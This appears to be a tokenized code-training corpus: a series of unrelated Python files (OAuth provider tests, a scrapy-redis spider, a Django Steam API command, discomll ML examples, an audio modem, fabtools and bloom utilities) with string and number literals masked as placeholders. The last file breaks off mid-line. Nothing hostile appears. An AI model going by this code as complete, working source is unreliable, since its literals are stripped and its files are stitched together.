__init__ ( self , srv ) <EOL> self . user = user <EOL> def authenticated_as ( self , cookie = None , ** kwargs ) : <EOL> return { "<STR_LIT>" : self . user } , time . time ( ) <EOL> AUTHN_BROKER = AuthnBroker ( ) <EOL> AUTHN_BROKER . add ( "<STR_LIT>" , DummyAuthn ( None , "<STR_LIT:username>" ) ) <EOL> AUTHZ = Implicit ( ) <EOL> class TestProvider ( object ) : <EOL> @ pytest . fixture ( autouse = True ) <EOL> def create_provider ( self ) : <EOL> self . provider = Provider ( "<STR_LIT>" , <EOL> sdb . SessionDB ( ISSUER ) , CDB , <EOL> AUTHN_BROKER , AUTHZ , verify_client , <EOL> baseurl = '<STR_LIT>' ) <EOL> def test_init ( self ) : <EOL> provider = Provider ( "<STR_LIT>" , sdb . SessionDB ( ISSUER ) , <EOL> CDB , <EOL> AUTHN_BROKER , AUTHZ , verify_client ) <EOL> assert provider <EOL> provider = Provider ( "<STR_LIT>" , sdb . SessionDB ( ISSUER ) , <EOL> CDB , <EOL> AUTHN_BROKER , AUTHZ , verify_client , <EOL> urlmap = { "<STR_LIT>" : [ "<STR_LIT>" ] } ) <EOL> assert provider . urlmap [ "<STR_LIT>" ] == [ "<STR_LIT>" ] <EOL> def test_authorization_endpoint_faulty_redirect_uri ( self ) : <EOL> bib = { "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> "<STR_LIT:state>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT:code>" ] , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> arq = AuthorizationRequest ( ** bib ) <EOL> resp = self . provider . authorization_endpoint ( request = arq . to_urlencoded ( ) ) <EOL> assert resp . status == "<STR_LIT>" <EOL> msg = json . loads ( resp . message ) <EOL> assert msg [ "<STR_LIT:error>" ] == "<STR_LIT>" <EOL> def test_authenticated ( self ) : <EOL> _session_db = { } <EOL> cons = Consumer ( _session_db , client_config = CLIENT_CONFIG , <EOL> server_info = SERVER_INFO , ** CONSUMER_CONFIG ) <EOL> sid , location = cons . begin ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> resp = self . provider . authorization_endpoint ( urlparse ( location ) . query ) <EOL> assert resp . status == "<STR_LIT>" <EOL> resp = urlparse ( resp . 
message ) . query <EOL> aresp = cons . handle_authorization_response ( query = resp ) <EOL> assert isinstance ( aresp , AuthorizationResponse ) <EOL> assert _eq ( aresp . keys ( ) , [ '<STR_LIT:state>' , '<STR_LIT:code>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert _eq ( cons . grant [ sid ] . keys ( ) , [ '<STR_LIT>' , '<STR_LIT:code>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> def test_authenticated_token ( self ) : <EOL> _session_db = { } <EOL> cons = Consumer ( _session_db , client_config = CLIENT_CONFIG , <EOL> server_info = SERVER_INFO , ** CONSUMER_CONFIG ) <EOL> sid , location = cons . begin ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> QUERY_STRING = location . split ( "<STR_LIT:?>" ) [ <NUM_LIT:1> ] <EOL> resp = self . provider . authorization_endpoint ( QUERY_STRING ) <EOL> auth_resp = parse_qs ( urlparse ( resp . message ) . fragment ) <EOL> assert "<STR_LIT>" in auth_resp <EOL> assert auth_resp [ "<STR_LIT>" ] [ <NUM_LIT:0> ] == "<STR_LIT>" <EOL> def test_token_endpoint ( self ) : <EOL> authreq = AuthorizationRequest ( state = "<STR_LIT:state>" , <EOL> redirect_uri = "<STR_LIT>" , <EOL> client_id = "<STR_LIT>" ) <EOL> _sdb = self . provider . sdb <EOL> sid = _sdb . access_token . key ( user = "<STR_LIT>" , areq = authreq ) <EOL> access_grant = _sdb . access_token ( sid = sid ) <EOL> _sdb [ sid ] = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:code>" : access_grant , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> areq = AccessTokenRequest ( code = access_grant , <EOL> redirect_uri = "<STR_LIT>" , <EOL> client_id = "<STR_LIT>" , <EOL> client_secret = "<STR_LIT>" , <EOL> grant_type = '<STR_LIT>' ) <EOL> resp = self . provider . token_endpoint ( request = areq . to_urlencoded ( ) ) <EOL> atr = AccessTokenResponse ( ) . deserialize ( resp . 
message , "<STR_LIT>" ) <EOL> assert _eq ( atr . keys ( ) , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_token_endpoint_unauth ( self ) : <EOL> authreq = AuthorizationRequest ( state = "<STR_LIT:state>" , <EOL> redirect_uri = "<STR_LIT>" , <EOL> client_id = "<STR_LIT>" ) <EOL> _sdb = self . provider . sdb <EOL> sid = _sdb . access_token . key ( user = "<STR_LIT>" , areq = authreq ) <EOL> access_grant = _sdb . access_token ( sid = sid ) <EOL> _sdb [ sid ] = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:code>" : access_grant , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> areq = AccessTokenRequest ( code = access_grant , <EOL> redirect_uri = "<STR_LIT>" , <EOL> client_id = "<STR_LIT>" , <EOL> client_secret = "<STR_LIT>" , <EOL> grant_type = '<STR_LIT>' ) <EOL> resp = self . provider . token_endpoint ( request = areq . to_urlencoded ( ) ) <EOL> atr = TokenErrorResponse ( ) . deserialize ( resp . message , "<STR_LIT>" ) <EOL> assert _eq ( atr . keys ( ) , [ '<STR_LIT>' , '<STR_LIT:error>' ] ) </s>
<s> from scrapy_redis . spiders import RedisSpider <EOL> from example . items import ExampleLoader <EOL> class MySpider ( RedisSpider ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> redis_key = '<STR_LIT>' <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> domain = kwargs . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . alowed_domains = filter ( None , domain . split ( '<STR_LIT:U+002C>' ) ) <EOL> super ( MySpider , self ) . __init__ ( * args , ** kwargs ) <EOL> def parse ( self , response ) : <EOL> el = ExampleLoader ( response = response ) <EOL> el . add_xpath ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> el . add_value ( '<STR_LIT:url>' , response . url ) <EOL> return el . load_item ( ) </s>
<s> from django . conf import settings <EOL> from django . core . management . base import BaseCommand , CommandError <EOL> from dotastats . models import Heroes <EOL> import simplejson as json <EOL> import urllib <EOL> import urllib2 <EOL> API_KEY = settings . STEAM_API_KEY <EOL> HEROES_URL = '<STR_LIT>' <EOL> class Command ( BaseCommand ) : <EOL> args = '<STR_LIT>' <EOL> help = '<STR_LIT>' <EOL> def handle ( self , * args , ** options ) : <EOL> try : <EOL> hero_list = [ ] <EOL> kargs = dict ( { '<STR_LIT:key>' : API_KEY , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> url_data = urllib . urlencode ( kargs ) <EOL> response = urllib2 . urlopen ( HEROES_URL + '<STR_LIT:?>' + url_data ) <EOL> json_data = json . loads ( response . read ( ) ) [ '<STR_LIT:result>' ] <EOL> response . close ( ) <EOL> for hero in json_data [ '<STR_LIT>' ] : <EOL> hero_list . append ( Heroes ( hero_id = hero [ '<STR_LIT:id>' ] , <EOL> client_name = hero [ '<STR_LIT:name>' ] , <EOL> dota2_name = hero [ '<STR_LIT>' ] , <EOL> ) ) <EOL> if len ( hero_list ) == <NUM_LIT:0> : <EOL> raise CommandError ( "<STR_LIT>" ) <EOL> Heroes . objects . bulk_create ( hero_list ) <EOL> self . stdout . write ( '<STR_LIT>' ) <EOL> except urllib2 . HTTPError , e : <EOL> if e . code == <NUM_LIT> : <EOL> json_data . update ( { '<STR_LIT:error>' : '<STR_LIT>' } ) <EOL> elif e . code == <NUM_LIT> : <EOL> json_data . update ( { '<STR_LIT:error>' : '<STR_LIT>' } ) <EOL> elif e . code == <NUM_LIT> : <EOL> json_data . update ( { '<STR_LIT:error>' : '<STR_LIT>' } ) <EOL> else : <EOL> json_data . update ( { '<STR_LIT:error>' : '<STR_LIT>' + e . code } ) <EOL> return </s>
<s> from discomll import dataset <EOL> from discomll . ensemble import distributed_random_forest <EOL> train = dataset . Data ( data_tag = [ "<STR_LIT>" , <EOL> "<STR_LIT>" ] , <EOL> X_indices = range ( <NUM_LIT:2> , <NUM_LIT:20> ) , <EOL> data_type = "<STR_LIT>" , <EOL> generate_urls = True , <EOL> id_index = <NUM_LIT:0> , <EOL> y_index = <NUM_LIT:1> , <EOL> X_meta = [ "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:c>" , "<STR_LIT:c>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:c>" ] , <EOL> delimiter = "<STR_LIT:U+002C>" ) <EOL> test = dataset . Data ( data_tag = [ "<STR_LIT>" , <EOL> "<STR_LIT>" ] , <EOL> data_type = "<STR_LIT>" , <EOL> generate_urls = True , <EOL> X_indices = range ( <NUM_LIT:2> , <NUM_LIT:20> ) , <EOL> id_index = <NUM_LIT:0> , <EOL> y_index = <NUM_LIT:1> , <EOL> X_meta = [ "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:c>" , "<STR_LIT:c>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:c>" ] , <EOL> delimiter = "<STR_LIT:U+002C>" ) <EOL> fit_model = distributed_random_forest . fit ( train , trees_per_chunk = <NUM_LIT:3> , max_tree_nodes = <NUM_LIT:50> , min_samples_leaf = <NUM_LIT:10> , <EOL> min_samples_split = <NUM_LIT:5> , class_majority = <NUM_LIT:1> , measure = "<STR_LIT>" , accuracy = <NUM_LIT:1> , <EOL> separate_max = True , random_state = None , save_results = True ) <EOL> predict_url = distributed_random_forest . predict ( test , fit_model ) <EOL> print predict_url </s>
<s> from disco . core import result_iterator <EOL> from discomll import dataset <EOL> from discomll . regression import linear_regression <EOL> from discomll . utils import model_view <EOL> train = dataset . Data ( data_tag = [ "<STR_LIT>" ] , <EOL> data_type = "<STR_LIT>" , <EOL> X_indices = [ <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> y_index = <NUM_LIT:2> ) <EOL> test = dataset . Data ( data_tag = [ "<STR_LIT>" ] , <EOL> data_type = "<STR_LIT>" , <EOL> X_indices = [ <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> y_index = <NUM_LIT:2> ) <EOL> fit_model = linear_regression . fit ( train ) <EOL> model = model_view . output_model ( fit_model ) <EOL> print model <EOL> predictions = linear_regression . predict ( test , fit_model ) <EOL> for k , v in result_iterator ( predictions ) : <EOL> print k , v [ <NUM_LIT:0> ] </s>
<s> import numpy as np <EOL> import logging <EOL> import itertools <EOL> from . import send as _send <EOL> from . import recv as _recv <EOL> from . import framing , common , stream , detect , sampling <EOL> log = logging . getLogger ( __name__ ) <EOL> def send ( config , src , dst , gain = <NUM_LIT:1.0> ) : <EOL> sender = _send . Sender ( dst , config = config , gain = gain ) <EOL> Fs = config . Fs <EOL> sender . write ( np . zeros ( int ( Fs * config . silence_start ) ) ) <EOL> sender . start ( ) <EOL> training_duration = sender . offset <EOL> log . info ( '<STR_LIT>' , training_duration / Fs ) <EOL> reader = stream . Reader ( src , eof = True ) <EOL> data = itertools . chain . from_iterable ( reader ) <EOL> bits = framing . encode ( data ) <EOL> log . info ( '<STR_LIT>' ) <EOL> sender . modulate ( bits = bits ) <EOL> data_duration = sender . offset - training_duration <EOL> log . info ( '<STR_LIT>' , <EOL> reader . total / <NUM_LIT> , data_duration / Fs ) <EOL> sender . write ( np . zeros ( int ( Fs * config . silence_stop ) ) ) <EOL> return True <EOL> def recv ( config , src , dst , dump_audio = None , pylab = None ) : <EOL> if dump_audio : <EOL> src = stream . Dumper ( src , dump_audio ) <EOL> reader = stream . Reader ( src , data_type = common . loads ) <EOL> signal = itertools . chain . from_iterable ( reader ) <EOL> log . debug ( '<STR_LIT>' , config . skip_start ) <EOL> common . take ( signal , int ( config . skip_start * config . Fs ) ) <EOL> pylab = pylab or common . Dummy ( ) <EOL> detector = detect . Detector ( config = config , pylab = pylab ) <EOL> receiver = _recv . Receiver ( config = config , pylab = pylab ) <EOL> try : <EOL> log . info ( '<STR_LIT>' , config . Fc / <NUM_LIT> ) <EOL> signal , amplitude , freq_error = detector . run ( signal ) <EOL> freq = <NUM_LIT:1> / ( <NUM_LIT:1.0> + freq_error ) <EOL> log . debug ( '<STR_LIT>' , ( freq - <NUM_LIT:1> ) * <NUM_LIT> ) <EOL> gain = <NUM_LIT:1.0> / amplitude <EOL> log . 
debug ( '<STR_LIT>' , gain ) <EOL> sampler = sampling . Sampler ( signal , sampling . Interpolator ( ) , freq = freq ) <EOL> receiver . run ( sampler , gain = <NUM_LIT:1.0> / amplitude , output = dst ) <EOL> return True <EOL> except BaseException : <EOL> log . exception ( '<STR_LIT>' ) <EOL> return False <EOL> finally : <EOL> dst . flush ( ) <EOL> receiver . report ( ) </s>
<s> from __future__ import absolute_import <EOL> from dirtyfields . dirtyfields import DirtyFieldsMixin </s>
<s> """<STR_LIT>""" <EOL> from fabric . api import run <EOL> from fabric . api import sudo <EOL> from fabric . context_managers import cd <EOL> from fabtools . utils import run_as_root <EOL> def clone ( remote_url , path = None , use_sudo = False , user = None ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' % remote_url <EOL> if path is not None : <EOL> cmd = cmd + '<STR_LIT>' % path <EOL> if use_sudo and user is None : <EOL> run_as_root ( cmd ) <EOL> elif use_sudo : <EOL> sudo ( cmd , user = user ) <EOL> else : <EOL> run ( cmd ) <EOL> def update ( path , branch = "<STR_LIT:default>" , use_sudo = False , user = None , force = False ) : <EOL> """<STR_LIT>""" <EOL> cmd = "<STR_LIT>" % branch <EOL> with cd ( path ) : <EOL> if use_sudo and user is None : <EOL> run_as_root ( cmd ) <EOL> elif use_sudo : <EOL> sudo ( cmd , user = user ) <EOL> else : <EOL> run ( cmd ) <EOL> def pull ( path , use_sudo = False , user = None ) : <EOL> """<STR_LIT>""" <EOL> if not path : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> cmd = '<STR_LIT>' <EOL> with cd ( path ) : <EOL> if use_sudo and user is None : <EOL> run_as_root ( cmd ) <EOL> elif use_sudo : <EOL> sudo ( cmd , user = user ) <EOL> else : <EOL> run ( cmd ) </s>
<s> """<STR_LIT>""" <EOL> from fabtools import nodejs <EOL> def installed_from_source ( version = nodejs . DEFAULT_VERSION ) : <EOL> """<STR_LIT>""" <EOL> if nodejs . version ( ) != version : <EOL> nodejs . install_from_source ( version ) <EOL> def package ( pkg_name , version = None , local = False ) : <EOL> """<STR_LIT>""" <EOL> pkg_version = nodejs . package_version ( pkg_name , local = local ) <EOL> if version : <EOL> if pkg_version != version : <EOL> nodejs . install_package ( pkg_name , version , local = local ) <EOL> else : <EOL> if pkg_version is None : <EOL> nodejs . install_package ( pkg_name , local = local ) </s>
<s> from fabric . api import puts , sudo <EOL> from fabtools . require . files import directory as require_directory <EOL> def test_list_partitions ( ) : <EOL> """<STR_LIT>""" <EOL> from fabtools . disk import partitions <EOL> partitions = partitions ( ) <EOL> for pname , ptype in partitions . items ( ) : <EOL> puts ( "<STR_LIT>" % ( pname , hex ( ptype ) ) ) <EOL> def test_format_and_mount ( ) : <EOL> """<STR_LIT>""" <EOL> from fabtools . disk import ismounted , mkfs , mount <EOL> assert not ismounted ( '<STR_LIT>' ) <EOL> try : <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> mkfs ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> require_directory ( '<STR_LIT>' , use_sudo = True ) <EOL> mount ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert ismounted ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> assert not ismounted ( '<STR_LIT>' ) <EOL> finally : <EOL> sudo ( '<STR_LIT>' , quiet = True ) <EOL> sudo ( '<STR_LIT>' , quiet = True ) <EOL> sudo ( '<STR_LIT>' , quiet = True ) </s>
<s> import unittest <EOL> import mock <EOL> class CreateUserTestCase ( unittest . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_uid_str ( self , mock_run_as_root ) : <EOL> from fabtools . user import create <EOL> create ( '<STR_LIT>' , uid = '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_uid_int ( self , mock_run_as_root ) : <EOL> from fabtools . user import create <EOL> create ( '<STR_LIT>' , uid = <NUM_LIT> ) </s>
<s> from __future__ import print_function <EOL> import argparse <EOL> import sys <EOL> import pkg_resources <EOL> from bloom . util import add_global_arguments <EOL> from bloom . util import handle_global_arguments <EOL> BLOOM_GENERATE_CMDS_GROUP = '<STR_LIT>' <EOL> def list_generator_commands ( ) : <EOL> generators = [ ] <EOL> for entry_point in pkg_resources . iter_entry_points ( group = BLOOM_GENERATE_CMDS_GROUP ) : <EOL> generators . append ( entry_point . name ) <EOL> return generators <EOL> def load_generator_description ( generator_name ) : <EOL> for entry_point in pkg_resources . iter_entry_points ( group = BLOOM_GENERATE_CMDS_GROUP ) : <EOL> if entry_point . name == generator_name : <EOL> return entry_point . load ( ) <EOL> def create_subparsers ( parser , generator_cmds ) : <EOL> metavar = '<STR_LIT:[>' + '<STR_LIT>' . join ( generator_cmds ) + '<STR_LIT:]>' <EOL> subparser = parser . add_subparsers ( <EOL> title = '<STR_LIT>' , <EOL> metavar = metavar , <EOL> description = '<STR_LIT>' . format ( metavar ) , <EOL> dest = '<STR_LIT>' <EOL> ) <EOL> for generator_cmd in generator_cmds : <EOL> desc = load_generator_description ( generator_cmd ) <EOL> cmd_parser = subparser . add_parser ( desc [ '<STR_LIT:title>' ] , description = desc [ '<STR_LIT:description>' ] ) <EOL> cmd_parser = desc [ '<STR_LIT>' ] ( cmd_parser ) <EOL> cmd_parser . set_defaults ( func = desc [ '<STR_LIT>' ] ) <EOL> add_global_arguments ( cmd_parser ) <EOL> def main ( sysargs = None ) : <EOL> parser = argparse . ArgumentParser ( <EOL> description = "<STR_LIT>" <EOL> ) <EOL> generator_cmds = list_generator_commands ( ) <EOL> create_subparsers ( parser , generator_cmds ) <EOL> args = parser . parse_args ( sysargs ) <EOL> handle_global_arguments ( args ) <EOL> sys . exit ( args . func ( args ) or <NUM_LIT:0> ) </s>
<s> from __future__ import print_function <EOL> import os <EOL> import sys <EOL> import traceback <EOL> from bloom . logging import debug <EOL> from bloom . logging import error <EOL> from bloom . logging import fmt <EOL> from bloom . logging import info <EOL> from bloom . generators . rpm . generator import generate_substitutions_from_package <EOL> from bloom . generators . rpm . generator import place_template_files <EOL> from bloom . generators . rpm . generator import process_template_files <EOL> from bloom . util import get_distro_list_prompt <EOL> try : <EOL> from rosdep2 import create_default_installer_context <EOL> except ImportError : <EOL> debug ( traceback . format_exc ( ) ) <EOL> error ( "<STR_LIT>" , exit = True ) <EOL> try : <EOL> from catkin_pkg . packages import find_packages <EOL> except ImportError : <EOL> debug ( traceback . format_exc ( ) ) <EOL> error ( "<STR_LIT>" , exit = True ) <EOL> def prepare_arguments ( parser ) : <EOL> add = parser . add_argument <EOL> add ( '<STR_LIT>' , nargs = '<STR_LIT:?>' , <EOL> help = "<STR_LIT>" ) <EOL> action = parser . add_mutually_exclusive_group ( required = False ) <EOL> add = action . add_argument <EOL> add ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = "<STR_LIT>" ) <EOL> add ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = "<STR_LIT>" ) <EOL> add = parser . add_argument <EOL> add ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> add ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> add ( '<STR_LIT>' , help = "<STR_LIT>" % get_distro_list_prompt ( ) ) <EOL> return parser <EOL> def get_subs ( pkg , os_name , os_version , ros_distro ) : <EOL> return generate_substitutions_from_package ( <EOL> pkg , <EOL> os_name , <EOL> os_version , <EOL> ros_distro <EOL> ) <EOL> def main ( args = None , get_subs_fn = None ) : <EOL> get_subs_fn = get_subs_fn or get_subs <EOL> _place_template_files = True <EOL> _process_template_files = True <EOL> package_path = os . 
getcwd ( ) <EOL> if args is not None : <EOL> package_path = args . package_path or os . getcwd ( ) <EOL> _place_template_files = args . place_template_files <EOL> _process_template_files = args . process_template_files <EOL> pkgs_dict = find_packages ( package_path ) <EOL> if len ( pkgs_dict ) == <NUM_LIT:0> : <EOL> sys . exit ( "<STR_LIT>" . format ( package_path ) ) <EOL> if len ( pkgs_dict ) > <NUM_LIT:1> : <EOL> sys . exit ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> os_data = create_default_installer_context ( ) . get_os_name_and_version ( ) <EOL> os_name , os_version = os_data <EOL> ros_distro = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> os_name = args . os_name or os_name <EOL> os_version = args . os_version or os_version <EOL> ros_distro = args . ros_distro or ros_distro <EOL> info ( fmt ( "<STR_LIT>" ) + <EOL> fmt ( "<STR_LIT>" % <EOL> ( os_name , os_version , [ p . name for p in pkgs_dict . values ( ) ] ) ) ) <EOL> for path , pkg in pkgs_dict . items ( ) : <EOL> template_files = None <EOL> try : <EOL> subs = get_subs_fn ( pkg , os_name , os_version , ros_distro ) <EOL> if _place_template_files : <EOL> place_template_files ( path ) <EOL> if _process_template_files : <EOL> template_files = process_template_files ( path , subs ) <EOL> if not _place_template_files and not _process_template_files : <EOL> place_template_files ( path ) <EOL> template_files = process_template_files ( path , subs ) <EOL> if template_files is not None : <EOL> for template_file in template_files : <EOL> os . remove ( os . path . normpath ( template_file ) ) <EOL> except Exception as exc : <EOL> debug ( traceback . format_exc ( ) ) <EOL> error ( type ( exc ) . __name__ + "<STR_LIT>" + str ( exc ) , exit = True ) <EOL> except ( KeyboardInterrupt , EOFError ) : <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> description = dict ( <EOL> title = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> main = main , <EOL> prepare_arguments = prepare_arguments <EOL> ) </s>
<s> '''<STR_LIT>''' <EOL> import os <EOL> import re <EOL> import shutil <EOL> import subprocess <EOL> import tempfile <EOL> class Tag ( object ) : <EOL> def __init__ ( self , name , timestamp = None ) : <EOL> self . name = name <EOL> self . timestamp = timestamp <EOL> class LogEntry ( object ) : <EOL> def __init__ ( self , msg , affected_paths , author ) : <EOL> self . msg = msg <EOL> self . author = author <EOL> self . _affected_paths = [ p for p in affected_paths if p ] <EOL> def affects_path ( self , path ) : <EOL> for apath in self . _affected_paths : <EOL> if path == '<STR_LIT:.>' : <EOL> return True <EOL> if apath . startswith ( os . path . join ( path , '<STR_LIT>' ) ) : <EOL> return True <EOL> return False <EOL> class VcsClientBase ( object ) : <EOL> def __init__ ( self , path ) : <EOL> self . path = path <EOL> def get_tags ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def get_latest_tag_name ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def get_log_entries ( self , from_tag , to_tag , skip_merges = False ) : <EOL> raise NotImplementedError ( ) <EOL> def replace_repository_references ( self , line ) : <EOL> return line <EOL> def _find_executable ( self , file_name ) : <EOL> for path in os . getenv ( '<STR_LIT>' ) . split ( os . path . pathsep ) : <EOL> file_path = os . path . join ( path , file_name ) <EOL> if os . path . isfile ( file_path ) : <EOL> return file_path <EOL> return None <EOL> def _run_command ( self , cmd , env = None ) : <EOL> cwd = os . path . abspath ( self . path ) <EOL> result = { '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( cmd ) , '<STR_LIT>' : cwd } <EOL> try : <EOL> proc = subprocess . Popen ( cmd , cwd = cwd , stdout = subprocess . PIPE , stderr = subprocess . STDOUT , env = env ) <EOL> output , _ = proc . communicate ( ) <EOL> result [ '<STR_LIT>' ] = output . rstrip ( ) <EOL> result [ '<STR_LIT>' ] = proc . returncode <EOL> except subprocess . CalledProcessError as e : <EOL> result [ '<STR_LIT>' ] = e . 
output <EOL> result [ '<STR_LIT>' ] = e . returncode <EOL> return result <EOL> def _truncate_timestamps ( self , tags ) : <EOL> lengths = [ <NUM_LIT:10> , <NUM_LIT:16> , <NUM_LIT> ] <EOL> for length in lengths : <EOL> considered_tags = [ t for t in tags if len ( t . timestamp ) > length ] <EOL> grouped_by_timestamp = { } <EOL> for t in considered_tags : <EOL> truncated_timestamp = t . timestamp [ : length ] <EOL> if truncated_timestamp not in grouped_by_timestamp : <EOL> grouped_by_timestamp [ truncated_timestamp ] = [ ] <EOL> grouped_by_timestamp [ truncated_timestamp ] . append ( t ) <EOL> for truncated_timestamp , similar_tags in grouped_by_timestamp . items ( ) : <EOL> if len ( similar_tags ) == <NUM_LIT:1> : <EOL> similar_tags [ <NUM_LIT:0> ] . timestamp = truncated_timestamp <EOL> class GitClient ( VcsClientBase ) : <EOL> type = '<STR_LIT>' <EOL> def __init__ ( self , path ) : <EOL> super ( GitClient , self ) . __init__ ( path ) <EOL> self . _executable = self . _find_executable ( '<STR_LIT>' ) <EOL> self . _repo_hosting = None <EOL> self . _github_base_url = '<STR_LIT>' <EOL> self . _github_path = None <EOL> def _get_author ( self , hash_ ) : <EOL> cmd = [ self . _executable , '<STR_LIT>' , hash_ , '<STR_LIT>' , '<STR_LIT:1>' , '<STR_LIT>' ] <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> return result [ '<STR_LIT>' ] <EOL> def get_tags ( self ) : <EOL> cmd_tag = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result_tag = self . _run_command ( cmd_tag ) <EOL> if result_tag [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result_tag [ '<STR_LIT>' ] ) <EOL> decorations = '<STR_LIT:U+002CU+0020>' . join ( re . findall ( '<STR_LIT>' , result_tag [ '<STR_LIT>' ] , re . MULTILINE ) ) + '<STR_LIT:U+002C>' <EOL> tag_names = re . 
findall ( '<STR_LIT>' , decorations ) <EOL> tags = [ ] <EOL> for tag_name in tag_names : <EOL> cmd = [ self . _executable , '<STR_LIT>' , tag_name , '<STR_LIT>' , '<STR_LIT:1>' , '<STR_LIT>' ] <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> tags . append ( Tag ( tag_name , result [ '<STR_LIT>' ] ) ) <EOL> self . _truncate_timestamps ( tags ) <EOL> return tags <EOL> def get_latest_tag_name ( self ) : <EOL> cmd_describe = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result_describe = self . _run_command ( cmd_describe ) <EOL> if result_describe [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result_describe [ '<STR_LIT>' ] ) <EOL> tag_name = result_describe [ '<STR_LIT>' ] <EOL> return tag_name <EOL> def get_log_entries ( self , from_tag , to_tag , skip_merges = False ) : <EOL> cmd = [ self . _executable , '<STR_LIT>' ] <EOL> if from_tag or to_tag : <EOL> cmd . append ( '<STR_LIT>' % ( '<STR_LIT>' % to_tag if to_tag else '<STR_LIT>' , from_tag if from_tag else '<STR_LIT>' ) ) <EOL> cmd . append ( '<STR_LIT>' ) <EOL> if skip_merges : <EOL> cmd . append ( '<STR_LIT>' ) <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> log_entries = [ ] <EOL> if result [ '<STR_LIT>' ] : <EOL> hashes = result [ '<STR_LIT>' ] . splitlines ( ) <EOL> for hash_ in hashes : <EOL> cmd = [ self . _executable , '<STR_LIT>' , hash_ , '<STR_LIT>' , '<STR_LIT:1>' , '<STR_LIT>' ] <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> if result [ '<STR_LIT>' ] == from_tag : <EOL> continue <EOL> msg = result [ '<STR_LIT>' ] <EOL> cmd = [ self . _executable , '<STR_LIT>' , hash_ , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = self . 
